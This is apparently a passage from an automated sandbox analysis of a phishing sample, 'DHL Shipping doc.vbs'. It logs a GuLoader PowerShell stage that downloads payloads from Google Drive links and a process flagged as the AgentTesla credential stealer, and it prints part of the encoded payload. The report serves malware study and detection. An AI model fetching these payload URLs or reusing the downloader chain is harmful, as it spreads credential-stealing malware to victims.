                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 1 | 192.168.2.4 | 49731 | 142.251.2.132 | 443 | 6692 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |

                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2024-04-24 04:48:53 UTC | 233 | OUT | GET /download?id=1xCKkDLKkiJgTC2N28hjl0l19UbuxJ6w9&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      2024-04-24 04:48:54 UTC | 4750 | IN | HTTP/1.1 200 OK
                                                      X-GUploader-UploadID: ABPtcPq3pN0qa0jeIDkWh9hVtpHzEGWYNLUNw6kjmAN0TVIJvOiXSMwBqTZ_QKnVWYg2YO9ZDD8
                                                      Content-Type: application/octet-stream
                                                      Content-Security-Policy: sandbox
                                                      Content-Security-Policy: default-src 'none'
                                                      Content-Security-Policy: frame-ancestors 'none'
                                                      X-Content-Security-Policy: sandbox
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Cross-Origin-Embedder-Policy: require-corp
                                                      Cross-Origin-Resource-Policy: same-site
                                                      X-Content-Type-Options: nosniff
                                                      Content-Disposition: attachment; filename="Koensfordeling.pfb"
                                                      Access-Control-Allow-Origin: *
                                                      Access-Control-Allow-Credentials: false
                                                      Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, 
X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Goog-Maps-Ios-Uuid, X-Goog-Maps-Android-Uuid, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context, x-goog-nest-jwt
                                                      Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                      Accept-Ranges: bytes
                                                      Content-Length: 445624
                                                      Last-Modified: Wed, 24 Apr 2024 00:15:44 GMT
                                                      Date: Wed, 24 Apr 2024 04:48:54 GMT
                                                      Expires: Wed, 24 Apr 2024 04:48:54 GMT
                                                      Cache-Control: private, max-age=0
                                                      X-Goog-Hash: crc32c=2QsOCA==
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close
                                                      2024-04-24 04:48:54 UTC4750INData Raw: 63 51 47 62 63 51 47 62 75 36 70 2b 48 41 44 72 41 67 33 37 36 77 4c 75 44 77 4e 63 4a 41 54 72 41 6f 62 39 63 51 47 62 75 59 59 4d 75 69 5a 78 41 5a 76 72 41 68 63 4c 67 66 46 7a 52 61 69 47 36 77 4a 70 66 65 73 43 39 43 2b 42 36 66 56 4a 45 71 44 72 41 6b 6e 45 63 51 47 62 63 51 47 62 36 77 4b 72 6f 37 71 6a 54 48 4a 63 63 51 47 62 63 51 47 62 36 77 4a 32 64 58 45 42 6d 7a 48 4b 63 51 47 62 36 77 4b 6d 43 49 6b 55 43 33 45 42 6d 2b 73 43 4b 46 7a 52 34 6e 45 42 6d 2b 73 43 47 78 4b 44 77 51 54 72 41 6c 66 52 36 77 4b 77 49 6f 48 35 46 73 52 72 41 6e 7a 4b 63 51 47 62 36 77 4b 68 4e 34 74 45 4a 41 52 78 41 5a 76 72 41 70 38 48 69 63 50 72 41 76 49 31 36 77 4b 57 46 6f 48 44 2b 78 75 79 41 65 73 43 75 7a 39 78 41 5a 75 36 69 47 72 4e 46 6e 45 42 6d 2b 73
                                                      Data Ascii: cQGbcQGbu6p+HADrAg376wLuDwNcJATrAob9cQGbuYYMuiZxAZvrAhcLgfFzRaiG6wJpfesC9C+B6fVJEqDrAknEcQGbcQGb6wKro7qjTHJccQGbcQGb6wJ2dXEBmzHKcQGb6wKmCIkUC3EBm+sCKFzR4nEBm+sCGxKDwQTrAlfR6wKwIoH5FsRrAnzKcQGb6wKhN4tEJARxAZvrAp8HicPrAvI16wKWFoHD+xuyAesCuz9xAZu6iGrNFnEBm+s


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      2 | 192.168.2.4 | 49738 | 142.251.2.139 | 443 | 2668 | C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2024-04-24 04:49:34 UTC | 216 | OUT | GET /uc?export=download&id=1GFtH2KO7xztBakHz0a-faxdoW0utL33g HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      2024-04-24 04:49:35 UTC | 1582 | IN | HTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Wed, 24 Apr 2024 04:49:34 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1GFtH2KO7xztBakHz0a-faxdoW0utL33g&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy: script-src 'nonce-lYCQJx7Q-I2mQ-s3-b0f5A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      3 | 192.168.2.4 | 49739 | 142.251.2.132 | 443 | 2668 | C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2024-04-24 04:49:35 UTC | 258 | OUT | GET /download?id=1GFtH2KO7xztBakHz0a-faxdoW0utL33g&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      2024-04-24 04:49:36 UTC | 4751 | IN | HTTP/1.1 200 OK
                                                      X-GUploader-UploadID: ABPtcPqv3diKXYeyVl08YGlJdFDMf70y-4h2PrMZJnVfzvuRJhXsqxU7UqnHE7CyHjxaC2_-uQ
                                                      Content-Type: application/octet-stream
                                                      Content-Security-Policy: sandbox
                                                      Content-Security-Policy: default-src 'none'
                                                      Content-Security-Policy: frame-ancestors 'none'
                                                      X-Content-Security-Policy: sandbox
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Cross-Origin-Embedder-Policy: require-corp
                                                      Cross-Origin-Resource-Policy: same-site
                                                      X-Content-Type-Options: nosniff
                                                      Content-Disposition: attachment; filename="PDOaqsEvftIXqv31.bin"
                                                      Access-Control-Allow-Origin: *
                                                      Access-Control-Allow-Credentials: false
                                                      Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, 
X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Goog-Maps-Ios-Uuid, X-Goog-Maps-Android-Uuid, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context, x-goog-nest-jwt
                                                      Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                      Accept-Ranges: bytes
                                                      Content-Length: 242752
                                                      Last-Modified: Wed, 24 Apr 2024 00:13:42 GMT
                                                      Date: Wed, 24 Apr 2024 04:49:36 GMT
                                                      Expires: Wed, 24 Apr 2024 04:49:36 GMT
                                                      Cache-Control: private, max-age=0
                                                      X-Goog-Hash: crc32c=7OS78w==
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      4 | 192.168.2.4 | 49740 | 104.26.13.205 | 443 | 2668 | C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2024-04-24 04:49:38 UTC | 155 | OUT | GET / HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                      Host: api.ipify.org
                                                      Connection: Keep-Alive
                                                      2024-04-24 04:49:38 UTC | 211 | IN | HTTP/1.1 200 OK
                                                      Date: Wed, 24 Apr 2024 04:49:38 GMT
                                                      Content-Type: text/plain
                                                      Content-Length: 13
                                                      Connection: close
                                                      Vary: Origin
                                                      CF-Cache-Status: DYNAMIC
                                                      Server: cloudflare
                                                      CF-RAY: 879377c83c0328f9-LAX
                                                      2024-04-24 04:49:38 UTC | 13 | IN | Data Raw: 31 35 34 2e 31 36 2e 31 30 35 2e 33 36
                                                      Data Ascii: 154.16.105.36



                                                      Target ID:0
                                                      Start time:06:48:48
                                                      Start date:24/04/2024
                                                      Path:C:\Windows\System32\wscript.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Shipping doc.vbs"
                                                      Imagebase:0x7ff6fc6f0000
                                                      File size:170'496 bytes
                                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:1
                                                      Start time:06:48:48
                                                      Start date:24/04/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                                                      Imagebase:0x7ff788560000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000001.00000002.2313093176.000001D96966F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:2
                                                      Start time:06:48:48
                                                      Start date:24/04/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:3
                                                      Start time:06:48:50
                                                      Start date:24/04/2024
                                                      Path:C:\Windows\System32\cmd.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Aptychus.Whi && echo $"
                                                      Imagebase:0x7ff78de10000
                                                      File size:289'792 bytes
                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:4
                                                      Start time:06:48:59
                                                      Start date:24/04/2024
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"
                                                      Imagebase:0xd50000
                                                      File size:433'152 bytes
                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.2123886427.0000000008920000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.2125155356.000000000A967000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.2112300960.0000000005ED0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:5
                                                      Start time:06:49:00
                                                      Start date:24/04/2024
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Aptychus.Whi && echo $"
                                                      Imagebase:0x240000
                                                      File size:236'544 bytes
                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:9
                                                      Start time:06:49:23
                                                      Start date:24/04/2024
                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                      Imagebase:0x850000
                                                      File size:516'608 bytes
                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2940602617.0000000022451000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2940602617.0000000022451000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2940602617.000000002247B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:moderate
                                                      Has exited:false

                                                      Reset < >
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2332787414.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b8a0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bae88bbddb8adc2b7c174e8e49e3dc1e678870619b82248bf78a33d3085fd262
                                                        • Instruction ID: 7c752774c7187628e2caffbedde3d555810ee9e470f82d7c67150354a7eb3880
                                                        • Opcode Fuzzy Hash: bae88bbddb8adc2b7c174e8e49e3dc1e678870619b82248bf78a33d3085fd262
                                                        • Instruction Fuzzy Hash: ECF1B730A0DA4E8FEBA8DF28D8557E977E1FF58310F04426EE84DC7295DB34A9458B81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2332787414.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b8a0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4512443c4d777cb65a19add930b3e9fe6eeb1afe0462ec557f42d2968c79f2a3
                                                        • Instruction ID: cebdef34003dcd843d740a5ba935b18f7ca3501bbbfd5b88459152774b09927f
                                                        • Opcode Fuzzy Hash: 4512443c4d777cb65a19add930b3e9fe6eeb1afe0462ec557f42d2968c79f2a3
                                                        • Instruction Fuzzy Hash: 1DE1E730A09A8E8FEBA8DF28C8657E977D1FF58310F14426ED84DC7295DF74A9418B81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2333704987.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b970000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8593d042746a4c5e3b01938dd4aef0cfecaba64598cbdc461d9dc9f84a9cba6f
                                                        • Instruction ID: 222b926ebb9a8313011eb339e0f79533651098bee7a584975bcc561bec7f0ca0
                                                        • Opcode Fuzzy Hash: 8593d042746a4c5e3b01938dd4aef0cfecaba64598cbdc461d9dc9f84a9cba6f
                                                        • Instruction Fuzzy Hash: 07D15731B1EA8D5FE7A5DBA848A5AB97BE0EF55310B0900FED45CC71E3DA18AD01C351
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2332787414.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b8a0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                        • Instruction ID: 04b822a5e3d45822b76be075df3c081dc68bfd048355e8304278f52f19c5101e
                                                        • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                        • Instruction Fuzzy Hash: F401677121CB0D4FD748EF0CE451AA5B7E0FB99364F10056DE58AC36A5D636E881CB45
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2118512475.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_78d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'kq$4'kq$$kq$$kq$$kq$$kq
                                                        • API String ID: 0-3289266258
                                                        • Opcode ID: c344de68aa594579b39f888f26bdf620b5cee1b39f129bbc3e9af5021c0d1521
                                                        • Instruction ID: 39f95bf0d92294a8f80bf3ee562db3ce47790716d63dc2faf5556af569ca67e5
                                                        • Opcode Fuzzy Hash: c344de68aa594579b39f888f26bdf620b5cee1b39f129bbc3e9af5021c0d1521
                                                        • Instruction Fuzzy Hash: 97B138B2B0421ADFDB249F69D90067ABBA6EFE5314F14846AD408CF351DB32DC45C7A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2122128189.00000000084F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_84f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: \V*k
                                                        • API String ID: 0-2107984380
                                                        • Opcode ID: 2809877f979b0830ece8cacc818bb7c7dfd87f0c467e33259953e4619c42a39f
                                                        • Instruction ID: caae70242263ef608372be9445a66398567ddbb979dda5556e4bdf0be3dad0de
                                                        • Opcode Fuzzy Hash: 2809877f979b0830ece8cacc818bb7c7dfd87f0c467e33259953e4619c42a39f
                                                        • Instruction Fuzzy Hash: 90B14870E00249CFDB15CFA9C98579EBBF2AF88315F14813EE915AB255EB749842CB81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2122128189.00000000084F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_84f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: da2df0569c867cedaa8d0c50473f58616f0832fe25b6941fee1da239026c8327
                                                        • Instruction ID: 0b53a8a2a1b24b73954d4820407d957864004f9b447ea14f2a7e6a35e58f7aa7
                                                        • Opcode Fuzzy Hash: da2df0569c867cedaa8d0c50473f58616f0832fe25b6941fee1da239026c8327
                                                        • Instruction Fuzzy Hash: 2EB15C70E00209CFDB11CFA9C9817AEBBF2AF88315F14853ED915AB355EB749841CB81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2118512475.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_78d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'kq$4'kq$4'kq$4'kq$4'kq$4'kq$x.wk$-wk
                                                        • API String ID: 0-1372607265
                                                        Uniqueness

